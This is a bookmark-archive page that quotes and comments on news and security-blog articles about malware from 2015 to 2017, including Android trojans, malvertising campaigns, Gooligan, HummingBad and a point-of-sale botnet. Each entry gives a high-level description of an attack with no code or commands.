…A device is considered retained if it continues to perform periodic Verify apps security check ups after an app download. If it doesn't, it's considered potentially dead or insecure (DOI). An app's retention rate is the percentage of all retained devices that downloaded the app in one day. Because retention is a strong indicator of device health, we work to maximize the ecosystem's retention rate.

Therefore, we use an app DOI scorer, which assumes that all apps should have a similar device retention rate. If an app's retention rate is a couple of standard deviations lower than average, the DOI scorer flags it…

…the DOI score flagged many apps in three well known malware families — Hummingbad, Ghost Push, and Gooligan. Although they behave differently, the DOI scorer flagged over 25,000 apps in these three families of malware because they can degrade the Android experience to such an extent that a non-negligible amount of users factory reset or abandon their devices.</p>


Nice. But tell me more about this thing where "we patch Android devices with our security update system." I don't think you actually do that. The OEMs do, if people are lucky.
security  android  malware 
january 2017 by charlesarthur
Did you download a Super Mario Run APK for Android? That's malware • VentureBeat
Jeff Grubb:
<p>Often before a new mobile game comes out, people who use an Android smartphone or tablet can get the game early by scouring the internet for Android install files known as APKs. These are like .exe files on Windows, and they enable you to install software on your device without having to go through the Google Play Store.

Naturally, with Nintendo launching Super Mario Run exclusively for iOS systems yesterday, Android owners are desperate to play the game. Since it’s not on Google Play, some folks are searching forums and APK databases for the Nintendo platformer. If you do this, what you will find instead are viruses and other malicious pieces of software attempting to look like Super Mario Run.

Super Mario Run, you see, doesn’t have an APK for Android yet.

Many shady websites, like KO Player, are already hosting files that they claim are an APK for Super Mario Run that will enable you to play the game on a Samsung Galaxy, an LG V20, or a Google Pixel. But the reality is that these are almost also viruses of some sort.</p>
supermario  malware 
december 2016 by charlesarthur
Adgholas malvertising: business as usual • Malwarebytes blog
Jérôme Segura:
<p>In October, there was the first instance of AdGholas going through Yahoo’s ad network to deliver their malicious ad. This one was delivered within the Yahoo mail interface (users checking their mail would be shown the rogue advert).

It was not until much later (11/27) that we were finally able to reproduce the malvertising chain from a genuine residential IP address with a machine clean of any monitoring tools, only capturing traffic transparently. Up until then, we only had very strong suspicions that something was going on, but without a network capture, we simply did not possess the ‘smoking gun’ required to make an affirmative claim. As soon as we had evidence of malfeasance (November 27th), we informed Yahoo of our discovery.

It was quite revealing that only a few days (11/30) after our report to Yahoo, we saw AdGholas switch to another domain on the very same server (broxu[.]com) being used with the exact same tricks.

Large publishers such as the MSN network were once again serving malware.</p>

I wonder how you could hack millions of email accounts belonging to a company that served adverts with its email. (Related question: how good are Google's defences against same for its majority of users who don't use two-factor authentication?)
Yahoo  malware  malvertising 
december 2016 by charlesarthur
Holy crap did I get the most annoying trojan attempt ever! • SuperGlobalMegaCorp
"Neozeed":
<p>Sit down kids, it’s time for an old man rant.

So yeah, I have one of those clients who wants to use ‘one of those’ file sharing sites. UGH.  I swear I’m to the point of just paying for an Office 365 subscription for them so I don’t have to deal with this kind of shit.  So I hit the site on my phone, then it jumps to this genchatu.top site.  Fantastic.

Then I’m alerted that my phone is 28.1% DAMAGED, and somehow my phone’s SIM card will be damaged!  Yes, it’s one of these scam sites!

<img src="ªªhttps://virtuallyfun.superglobalmegacorp.com/wordpress/wp-content/uploads/2016/12/超级截屏_20161207_001143.pngºº" width="50%" />

Oh no, my phone apparently may be already physically damaged?  I guess this is once someone is tricked by this official Google looking image you’ll want to throw your phone against the wall.  As any user of Android will tell you updates from Google are non existent, and anything that could infect your phone, well is pretty much your problem.  You can beg the vendor, but lol, good luck.

I like to live dangerously, so yeah let’s look at the app.

<img src="ªªhttps://virtuallyfun.superglobalmegacorp.com/wordpress/wp-content/uploads/2016/12/超级截屏_20161207_001227.pngºº" width="50%" />


So with this scary and official looking thing it’s trying to railroad you into “Ace Cleaner”. I don’t know how on earth they haven’t either been reported, or knocked out of the app store. I guess Google is busy teaming up with Facebook trying to figure out how to censor the news appropriately instead of trying to squash actual scam artists.</p>


But as the reviews imply, these scams work. People download this stuff and it sits on their machines, and they probably don't realise it's watching everything they do.
malware  android 
december 2016 by charlesarthur
Millions exposed to malvertising that hid attack code in banner pixels • Ars Technica UK
Dan Goodin:
<p>Researchers from antivirus provider Eset said "Stegano," as they've dubbed the campaign, dates back to 2014. Beginning in early October, its unusually stealthy operators scored a major coup by getting the ads displayed on a variety of unnamed reputable news sites, each with millions of daily visitors. Borrowing from the word steganography—the practice of concealing secret messages inside a larger document that dates back to at least 440 BC—Stegano hides parts of its malicious code in parameters controlling the transparency of pixels used to display banner ads. While the attack code alters the tone or color of the images, the changes are almost invisible to the untrained eye.

The malicious script is concealed in the alpha channel that defines the transparency of pixels, making it extremely difficult for even sharp-eyed ad networks to detect. After verifying that the targeted browser isn't running in a virtual machine or connected to other types of security software often used to detect attacks, the script redirects the browser to a site that hosts three exploits for now-patched Adobe Flash vulnerabilities.</p>


Flash plus ad networks: it's a recipe for disaster.
malvertising  malware  flash 
december 2016 by charlesarthur
Routers behaving badly • net.wars
Wendy Grossman:
<p>Late on Saturday night, a small laptop started having trouble connecting. This particular laptop sometimes has these issues, which I put down to the peculiarities of running wired ethernet into it via a USB converter. But the next day I realized that the desktop was timing out on some connections, and one of the other laptops was refusing to connect to the internet at all. An unhappy switch somewhere in the middle? Or perhaps a damaged cable? The wireless part of the network, which I turned on as a test, worked much better, which lent credence to the cable idea.

By Monday morning, I had concluded the thing to do was to restart the main router. Things were fine after that. On Tuesday morning, some bounced emails from my server alerted me to the fact that my IP address had been placed on one of the three blacklists Spamhaus consults. It was only then that I realized my router was one of the ones affected by <a href="http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/">the 7547 bug</a>. If my network had been spewing botnet messages, the router was infected.</p>

She managed to fix it (pretty much) but as she points out, if even knowledgeable people are struggling with this, what hope for those who just buy a smart lightbulb or smart thermostat or smart whatever and assume that's the end of the story? We're building up trouble.
Iot  hacking  malware 
december 2016 by charlesarthur
More than 1 million Google accounts breached by Gooligan malware • Check Point Technologies
:
<p>The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device. Our research team has found infected apps on third-party app stores, but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages.

<img src="http://blog.checkpoint.com/wp-content/uploads/2016/11/info_4_REVISED_11.23.16.jpg" width="100%" />

After an infected app is installed, it sends data about the device to the campaign’s Command and Control (C&C) server.

Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153). These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user. If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.

After achieving root access, Gooligan downloads a new, malicious module from the C&C server and installs it on the infected device. This module injects code into running Google Play or GMS (Google Mobile Services) to mimic user behavior so Gooligan can avoid detection, a technique first seen with the mobile malware HummingBad. The module allows Gooligan to:

• Steal a user’s Google email account and authentication token information
• Install apps from Google Play and rate them to raise their reputation
• Install adware to generate revenue

Ad servers, which don’t know whether an app using its service is malicious or not, send Gooligan the names of the apps to download from Google Play. After an app is installed, the ad service pays the attacker. Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C&C server.</p>

Affects Android 4 and 5, which covers 74% of users. Most of those affected are in Asia, but about 120,000 in Europe. Remember the thing I said the other day about Android vulnerabilities being theoretical, until they aren't? This is that.
Android  malware  hacking  gooligan 
november 2016 by charlesarthur
Spotify has been sending computer viruses to listeners • Daily Telegraph
James Titcomb:
<p>Spotify has been found to be serving malware to listeners who use the free version of its service, with its adverts directing PC users to virus-riddled websites.

<a href="https://community.spotify.com/t5/Ongoing-Issues/Spotify-Free-ads-causes-browser-to-launch-on-malware-virus/idi-p/1461222">Users of the music streaming software reported</a> that the program would continually open their default web browser to load websites infested with malware.

The issue affected users of Windows, Mac and Linux operating systems, leading to complaints on the Spotify Community website and Twitter. The malware websites, some of which attempt to install viruses automatically without the user clicking anything, appear to have nothing to do with the advert in question.

The problem appears to be associated with a single advert on Spotify, which the company said it had removed after discovering the problem.</p>


Collateral damage of the advertising-funded method. If advertising is roughly 2% of US GDP, what percentage is malvertising?
spotify  malware 
october 2016 by charlesarthur
Malware in Transmission client • Transmission
<p>Q. What happened?

A. It appears that on or about August 28, 2016, unauthorized access was gained to our website server. The official Mac version of Transmission 2.92 was replaced with an unauthorized version that contained the OSX/Keydnap malware. The infected file was available for download somewhere between a few hours and less than a day. Additional information about the malware is available <a href="http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/">here</a> and <a href="http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">here</a>.</p>


Keydnap steals credentials from the OSX keychain (where system and personal passwords live). Yes, there is a certain irony in a Bittorrent client being subverted like this.
malware  mac 
september 2016 by charlesarthur
Breaking News 1: How monetizing became malvertising • Reynolds Journalism Institute
Barrett Golding:
<p>Bromium Labs found <a href="https://www.bromium.com/company/press-releases/bromium-threat-report-identifies-security-risks-popular-websites-and-software.html">more than half the ads with malware payloads were on either news or entertainment websites</a>, with news at the top of the pack (32 percent). Like all marketers, malvertisers want premiere placement on well-respected sites. The ad-bidding process grants them their wish.

In March 2016 the websites of The New York Times, BBC, Weather Network, The Hill, Newsweek, AOL, MSN, and NFL all, as CNET reported, “<a href="http://www.cnet.com/news/new-york-times-bbc-dangerous-ads-ransomware-malvertising/">inadvertently ran malicious ads that attempted to hijack the computers of visitors and demand a ransom</a>.”

This even juicier website-breaking news is from Engadget: “Forbes asked readers to turn off ad blockers in order to view the article. After doing so, visitors were immediately served with pop-under malware, primed to infect their computers, and likely silently steal passwords, personal data and banking information.”

<img src="https://www.rjionline.org/images/posts/Bromium-Malvertisement-attack-sources.png" width="100%" />
<em>Malicious advertisements sources, Bromium Labs</em>

The problem is not new. It’s been happening on news sites for years. These headlines are from 2013:

“<a href="http://www.adweek.com/news/technology/amount-questionable-online-traffic-will-blow-your-mind-153083">The Amount of Questionable Online Traffic Will Blow Your Mind: The World Wide rip-off</a>” - Adweek.
“<a href="http://adcontrarian.blogspot.co.il/2013/06/the-75-billion-ad-swindle.html">The $7.5 Billion Ad Swindle</a>” - The Ad Contrarian.
Google has <a href="http://www.anti-malvertising.com/">run an anti-malvertising team since 2009</a>. Here’s a recent report on their progress:
<p>Google is enabling traffic laundering, where websites with pirated content redirect visitors to shell websites displaying AdSense ads. These ads finance piracy, and Google is taking a cut in the process. Google clients have no clue of the reputational risk they run by using AdSense.
—“<a href="https://kalkis-research.com/real-life-example-google-implication-ad-fraud-traffic-laundering">A Real Life Example of Google’s Implication in Ad Fraud and Traffic Laundering,” Kalkis Research</a></p>


CNBC and CNN commentator Shelly Palmer wrote, “Ad tech has evolved into a toxic ecosystem that is killing itself, and it is taking digital advertising with it.” His article, “<a href="http://www.shellypalmer.com/2016/06/well-ad-tech-dies/">What We’ll Do When Ad Tech Dies</a>,” concludes, “Ad tech will be with us in its current form until someone goes to jail.”</p>


Why is it that news sites are so particularly targeted? Because they take a ton more ad-tech ads? (Via Rob Leathern.)
advertising  malware 
august 2016 by charlesarthur
WikiLeaks released a cache of malware in its latest email dump • Engadget
Andrew Dalton:
<p>In its rush to let information be free, WikiLeaks has released over 80 different malware variants while publishing its latest collection of emails from Turkey's ruling AKP political party. In a <a href="https://github.com/bontchev/wlscrape/blob/master/malware.md">Github post</a>, security expert Vesselin Bontchev has laid out many of the instances of malicious links, most of which came from "run-of-the-mill" spam and phishing emails found in the dump. While WikiLeaks has claimed the emails shed light on corruption within the Turkish government, New York Times reporter Zeynep Tufekci has pointed out that the materials have little to do with Turkish politics and mostly appear to be mailing lists and spam.</p>


"In its rush to let information be free", or perhaps "With disregard for innocent people who would be affected".
malware  wikileaks 
august 2016 by charlesarthur
Malware in the browser: how you might get hacked by a Chrome extension • Kjaer
Maxime Kjaer:
<p>On my Facebook news feed, I had noticed that one of my friends was regularly liking some weird, lewd, clickbaity links. Now clickbait content is far from uncommon on Facebook, but something was off in this case. I had noticed a pattern: it was always the same friend who would Like the same type of links. They would always have around 900 Likes and no comments, while the page behind them has about 30 Likes. Even weirder: every single post on that page is posted 25 times.

<img src="https://kjaer.io/images/chrome-malware/liked-post.png" width="100%" />
<em>One of the posts that my friend had Liked. 940 Likes, no comments.</em>

Now I know my friend; he’s a smart guy, so I don’t really see him liking tons of this (frankly) crap content. Intrigued, I decided to go down the rabbit hole and see what this was all about.

So I clicked on one of these links. Huge mistake.

I was instantly greeted with a message saying that I should verify my age before I could view the content. The semi-raunchy nature of the content made it seem sort of justified. What wasn’t justified, though, was the fact that this verification had to be done by installing a Chrome extension.</p>


Of course your spidey sense is tingling. But as you read through you'll be saying "Whaaaa..?" The suggested moral: Google ought to vet the makers of Chrome extensions or manually verify them.

Not sure that's going to happen in a hurry. However it is a new avenue of infection: Kjaer found 160,000 PCs infected with this malware.
chrome  javascript  malware  security 
july 2016 by charlesarthur
HummingBad malware puts 10 million Android devices at risk • SlashGear
JC Torres:
<p>According to Check Point, as many as 10m devices around the globe have infected apps installed on their Android smartphone or tablet. Unsurprisingly, majority of those come from China, India, and the usual Asian countries, but the US isn't clean of it either.

<img src="http://cdn.slashgear.com/wp-content/uploads/2016/07/hummingbad-2.jpg" alt="hummingbad-2" width="100%" />

At the moment, however, HummingBad isn't doing maximum damage. It does attempt to root devices in order to further spread its malware, install more infected apps, and whatnot. Failing to do that, it has fallback measures to gain access. All of these are being done in the name of generating ad revenue. However, considering it tries to gain root access, its actual potential is far more frightening. That said, based on Check Point's own data, older Android devices are more prone to getting infected, with Android 5.0 Lollipop and Android 6.0 Marshmallow showing the smallest shares.

<img src="http://cdn.slashgear.com/wp-content/uploads/2016/07/hummingbad-3.jpg" alt="hummingbad-3" width="100%" />

However, it is the narrative around HummingBad that is actually more worrying. Check Point traced the malware to a Chinese entity named YingMob, which turned out to be a mobile ad server company. In a nutshell, it is actually a legit company partnering with other legit companies to serve ads. Most malware groups turn to hide underground, but YingMob operates out in the open, though the group behind HummingBad is just one part of the company.</p>

Usually Android malware is restricted to China; this is unusual and worrying.
malware  android 
july 2016 by charlesarthur
Godless mobile malware can root 90% of Android devices
<p>The mobile malware masquerades as harmless-looking mobile apps, including this Summer Flashlight app:

<img src="https://cdn.grahamcluley.com/wp-content/uploads/2016/06/godless-app.png" width="100%" />

Several clean apps on Google Play also share the same developer certificate with malicious versions containing the Godless code. This means there is the potential for a user to be upgraded to a malicious version of an app without their knowledge.

If and when that infection occurs, Godless won't lock their screen and demand hundreds of dollars in ransom. Neither will it place calls to mysterious Chinese phone numbers. Instead it will have the ability to download any app it chooses, including those that spam users with ads and/or install backdoors onto an infected device.</p>


More details on the <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/">Trend Micro blog post</a>. It starts installing when the screen switches off - sneaky.
malware  android 
june 2016 by charlesarthur
Slicing into a point-of-sale botnet • Krebs on Security
Brian Krebs:
<p>Over the weekend, I heard from a source who said that since November 2015 he’s been tracking a collection of hacked cash registers. This point-of-sale botnet currently includes more than 100 infected systems, and according to the administrative panel for this crime machine at least half of the compromised systems are running a malicious Microsoft Windows process called cicipos.exe.

The admin panel shows the Internet address of a number of infected point-of-sale devices as of June 4, 2016. Many of these appear to be at Cici’s Pizza locations.

KrebsOnSecurity has not been able to conclusively tie the botnet to CiCi’s. Neither CiCi’s nor its outside public relations firm have responded to multiple requests for comment. However, the control panel for this botnet includes the full credit card number and name attached to the card, and several individuals whose names appeared in the botnet control panel confirmed having eaten at CiCi’s Pizza locations on the same date that their credit card data was siphoned by this botnet.

Among those was Richard Higgins of Prattville, Ala., whose card data was recorded in the botnet logs on June 4, 2016. Reached via phone, Higgins confirmed that he used his debit card to pay for a meal he and his family enjoyed at a CiCi’s location in Prattville on that same date.</p>


Of course, if they used chip/PIN.. then probably the PINs would get stolen too. 🤔
security  pos  malware 
june 2016 by charlesarthur
Analysis of Twitter.com password leak • LeakedSource
<p>This data set contains 32,888,300 records. Each record may contain an email address, a username, sometimes a second email and a visible password. We have very strong evidence that Twitter was not hacked, rather the consumer was. These credentials however are real and valid. Out of 15 users we asked, all 15 verified their passwords.

The explanation for this is that tens of millions of people have become infected by malware, and the malware sent every saved username and password from browsers like Chrome and Firefox back to the hackers from all websites including Twitter.

The proof for this explanation is as follows:

• The join dates of some users with uncrackable (yet plaintext) passwords were recent. There is no way that Twitter stores passwords in plaintext in 2014 for example.
• There was a very significant amount of users with the password "<blank>" and "null". Some browsers store passwords as "<blank>" if you don't enter a password when you save your credentials.
•The top email domains don't match up to a full database leak; more likely the malware was spread to Russians.</p>


Websites <em>including</em> Twitter. That's worrying. There's also a list of the passwords used. Guess which six-character one comes top?
twitter  password  malware  browser  hack 
june 2016 by charlesarthur
190 Android apps infected with malware discovered on the Google Play Store • Softpedia
Catalin Cimpanu:
<p>Researchers spotted the malware-infected apps towards the end of April, but only recently have these apps been removed. The Russian security firm says the apps contained a version of the malware identified as Android.Click.95.

According to <a href="http://vms.drweb.com/virus/?_is=1&i=8058237">their analysis</a> of the malware's mode of operation, Android.Click waits for six hours after the user installs it as part of an infected app.

After the six hours pass, the malware forcibly loads a URL in the user's browser, which contains scareware-like messages that tell the user his system or his battery has problems.

To fix his issues, the user has to download another app. In the cases they've observed, Dr.Web researchers say the malware redirected users back to the Google Play Store to download these second-stage apps.

"For each download, fraudsters receive interest under the terms of affiliate advertising agreements," Dr.Web researchers explained. "It explains why Android.Click.95 is so much widespread—the cybercriminals try to make as much profit as they can from these downloads."</p>


To be precise, "Android.Click.95 opens the fraudulent website every 2 minutes from the moment when it has started functioning, making it irritating to use the infected device. At that, the maximum number of visits of the fraudulent website is limited to 1000 times." Seems to be Russian apps (judging from the analysis) but likely to spread.
android  malware 
may 2016 by charlesarthur
Dental Assn mails malware to members » Krebs on Security
Brian Krebs:
<p>The American Dental Association (ADA) says it may have inadvertently mailed malware-laced USB thumb drives to thousands of dental offices nationwide.

The problem first came to light in a <a href="http://www.dslreports.com/forum/r30717075-ADA-just-sent-me-a-surprise">post</a> on the DSL Reports Security Forum. DSLR member “Mike” from Pittsburgh got curious about the integrity of a USB drive that the ADA mailed to members to share updated “dental procedure codes” — codes that dental offices use to track procedures for billing and insurance purposes…</p>


It had a launcher which would take a PC to a site which would try to download malware; and few antivirus checkers would find it.
<p>In response to questions from this author, the ADA said the USB media was manufactured in China by a subcontractor of an ADA vendor, and that some 37,000 of the devices have been distributed. The not-for-profit ADA is the nation’s largest dental association, with more than 159,000 members.

“Upon investigation, the ADA concluded that only a small percentage of the manufactured USB devices were infected,” the organization wrote in an emailed statement.</p>


One should now routinely assume that anything involving (a) Flash (b) USB drives is potentially a malware route. Fortunately, both are avoidable in normal life.
dentist  malware 
may 2016 by charlesarthur
Met police chief blaming the victims » Light Blue Touchpaper
Ross Anderson, professor of security engineering at the University of Cambridge, wrote a letter to The Times:
<p>[Met Police commissioner] Sir Bernard Hogan-Howe <a href="http://www.theguardian.com/uk-news/2016/mar/24/dont-refund-online-victims-met-chief-tells-banks">argues that banks should not refund online fraud victims</a> as this would make people careless with their passwords and anti-virus software (p1, March 24, and letters Mar 25 & 26). This is called secondary victimisation. Thirty years ago, a chief constable might have said that rape victims had themselves to blame for wearing nice clothes; if he were to say that nowadays, he’d be sacked. Hogan-Howe’s view of bank fraud is just as uninformed, and just as offensive to victims.

About 5 percent of computers running Windows are infected with malware, and common bank fraud malware such as Zeus lets the fraudster redirect transactions. You think you’re paying £150 to your electricity bill, while the malware is actually sending £9000 to Russia. The average person is helpless against this; everything seems normal, and antivirus products usually only detect it afterwards.

Much of the blame lies with the banks, who let the users of potentially infected computers make large payments instantly, rather than after a day or two, as used to be the case. They take this risk because regulators let them dump much of the cost of the resulting fraud on customers.</p>


Hogan-Howell really put his foot in it, but it's the inertia that he represents - and the attempt to shift the blame - which is the most insidious.
crime  cyber  malware 
march 2016 by charlesarthur
AceDeceiver: first iOS trojan exploiting Apple DRM design flaws to infect any iOS device » Palo Alto Networks
Claud Xiao:
<p>We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.

What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector…


…To carry out the attack, the [malware] author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning. But what it’s also doing is surreptitiously installing the malicious apps on any iOS device that is connected to the PC on which Aisi Helper is installed. (Of note, only the most recent app is installed on the iOS device(s) at the time of infection, not all three at the same time.) These malicious iOS apps provide a connection to a third party app store controlled by the author for user to download iOS apps or games. It encourages users to input their Apple IDs and passwords for more features, and provided these credentials will be uploaded to AceDeceiver’s C2 server after being encrypted. We also identified some earlier versions of AceDeceiver that had enterprise certificates dated March 2015.

As of this writing, it looks as though AceDeceiver only affects users in mainland China.</p>


So it's really a Windows infection?
apple  ios  malware 
march 2016 by charlesarthur
275 million Android phones imperiled by new code-execution exploit » Ars Technica UK
Dan Goodin:
<p>The NorthBit-developed attack exploits a Stagefright vulnerability discovered and disclosed last year by Zimperium, the security firm that first demonstrated the severe weaknesses in the code library. For reasons that aren't yet clear, Google didn't fix the vulnerability in some versions, even though the company eventually issued a patch for a different bug that had made the Zimperium exploits possible. While the newer attack is in many ways a rehash of the Zimperium work, it's able to exploit an information leak vulnerability in a novel way that makes code execution much more reliable in newer Android releases. Starting with version 4.1, Android was fortified with an anti-exploitation defense known as address space layout randomization, which loads downloaded code into unpredictable memory regions to make it harder for attackers to execute malicious payloads. The breakthrough of Metaphor is its improved ability to bypass it.

"They've proven that it's possible to use an information leak to bypass ASLR," Joshua Drake, Zimperium's vice president for platform research and exploitation, told Ars. "Whereas all my exploits were exploiting it with a brute force, theirs isn't making a blind guess. Theirs actually leaks address info from the media server that will allow them to craft an exploit for whoever is using the device."</p>


Affects versions 2.2 through to 4.0, and 5.0 and 5.1. Which is 41.1% of phones, according to latest data from Google. Would have thought that is more than 275m, actually.
android  stagefright  malware 
march 2016 by charlesarthur
Crypto-ransomware spreads via poisoned ads on major websites » Tripwire
Graham Cluley:
<p>Some of the world’s most popular news and entertainment websites have been spreading poisoned adverts to potentially hundreds of thousands of visitors, putting innocent readers at risk of having their computers hit by threats such as ransomware.

Famous sites which displayed the malicious ads and endangered visiting computers include MSN, bbc.com, the New York Times, AOL and Newsweek.

As a result, researchers at Malwarebytes say that they saw a “huge spike in malicious activity” over the weekend.

Security analysts at TrendLabs and Malwarebytes report that the attack is one of the largest ransomware campaigns seen in years, taking advantage of a recently-updated version of the notorious Angler Exploit Kit to spread malware.

Just last month the Angler Exploit Kit was found to be targeting PCs and Macs after it was updated to take advantage of a known vulnerability in Microsoft Silverlight…

…It seems glaringly apparent to me that there is so much malicious advertising on the internet that anytime you surf even legitimate sites without an ad blocker in place, you are putting your computer’s data at risk.</p>
adblocking  malware  ransomware 
march 2016 by charlesarthur
Invisible porn-clicking trojans invade Android's Google Play store » Tripwire
Graham Cluley:
<p>many bogus versions of a wide range of apps (ranging from Toy Truck Rally to Subway Surfers 2 to GTA San Andreas and Tinder) have been distributed by fraudsters who wish to use your bandwidth to earn themselves affiliate income by clicking on adverts for pornographic websites.

Of course, if the apps popped up a copy of the Chrome browser to click on the X-rated ads then chances are that you would notice something unusual was afoot. Criminals have learnt from experience that announcing their presence so obviously only hinders their money-making plans.

So, in the case of “<a href="http://www.welivesecurity.com/2016/02/24/porn-clicker-trojans-google-play-analysis/">Porn Clicker</a>”, the apps spin up an invisible browser window – meaning that any ad-clicking is invisible to the naked eye. And then, a minute or so later, it clicks again.

The money soon begins to earn cash for the criminals – which is a truth especially evident when you consider that some of the bogus apps have been downloaded thousands of times.</p>


Android is following exactly the same malware growth path as Windows did on the desktop.
android  malware 
february 2016 by charlesarthur
Pirated App Store client for iOS found on Apple's App Store » HelpNet Security
Zeljka Zorz:
<p>The app hasn’t been flagged as potentially dangerous by Apple’s strict code reviewers, most likely because the app was made to look like a simple app for learning English if a reviewer (or user) accessed the app from anywhere outside China, and showed its true face only for those located in China.

Also, it’s coded in the Lua programming language, and this allows the developers to update the app remotely and repeatedly without triggering Apple’s app review process.

The app was available for download in the App Store for over three and a half months (since October 30, 2015 to the end of last week), but has now been removed.

The researchers haven’t discovered any actual malicious functionality in the app, but given its capabilities, it should definitely be considered risky to use. They dubbed it ZergHelper, and discovered over 50 enterprise-signed versions of the app being distributed in the wild through alternative channels.</p>


Enterprise certificates are still the biggest weak point for getting apps onto iPhones. This one was clever too in using geolocation, and Lua.
apple  malware 
february 2016 by charlesarthur
Android malware spread via porn websites to generate fake ad revenue » Grahamcluley.com
David Bisson:
<p>Researchers have spotted a new type of mobile malware that roots Android devices with the purpose of generating fraudulent ad revenue for its operator.

Earlier this month, Andrey Polkovnichenko and Oren Koriat, two members of the Check Point Research Team, <a href="http://blog.checkpoint.com/2016/02/04/hummingbad-a-persistent-mobile-chain-attack/">wrote in a blog post</a> about how they detected the malware, which they have named "HummingBad," as part of a drive-by download attack served by porn websites against two customers' Android devices.

Curious, they decided to dig into the malware and figure out what makes it tick.

As it turns out, HummingBad is a complex rootkit whose components are encrypted, in an attempt to avoid being flagged by security solutions as malicious.</p>
android  malware  advertising 
february 2016 by charlesarthur
Cyber sacrilege at Christmas: Android malware hiding in Bible (and Quran) apps » Forbes
Thomas Fox-Brewster:
<p>Security company Proofpoint isn’t revealing which exact Android apps are doing bad deeds, as it is going through the process of disclosure with the affected developers and vendors. It is instead revealing data on the number of malware or aggressive adware targeting the Google operating system. Proofpoint analyzed over 5,600 unique Bible apps (4,154 for Android and 1,500 for Apple's iOS), including 208 that contained known malicious code and 140 were classified as “high risk” based on their behavior, all for the Android platform. Apple is evidently doing a good job of keeping out dangerous Bibles.

Kevin Epstein, VP of threat operations at Proofpoint, said those apps with known malicious behavior let attackers steal information from mobile devices, exploit zero-day vulnerabilities, possibly jailbreak or “root” a device, pilfer login credentials and communicate with IP addresses previously linked with rogue activity.</p>


How is it that Apple is keeping out the dangerous ones, though? You'd assume it would be targeted just the same.
android  bible  malware 
december 2015 by charlesarthur
Reader’s Digest and other WordPress sites compromised to push Angler EK » Malwarebytes Unpacked
Jérôme Segura:
<p>We’re seeing another uptick in WordPress compromises, using a slightly different modus operandi than the EITest campaign we recently blogged about, being responsible for a large number of infections via the Angler exploit kit.

The attack consists of a malicious script injected within compromised WordPress sites that launches another URL whose final purpose is to load the Angler exploit kit. Site owners that have been affected should keep in mind that those injected scripts/URLs will vary over time, although they are all using the same pattern (see IOCs below for some examples).

The website of popular magazine Reader’s Digest is one of the victims of this campaign and people who have visited the portal recently should make sure they have not been infected. The payload we observed at the time of capture was Bedep which loaded Necurs a backdoor Trojan, but that of course can change from day to day.</p>


Solution: don't read sites on desktop? (Thanks Ivan Ivanovich.)
wordpress  malware 
november 2015 by charlesarthur
« earlier      
per page:    204080120160

Copy this bookmark:





to read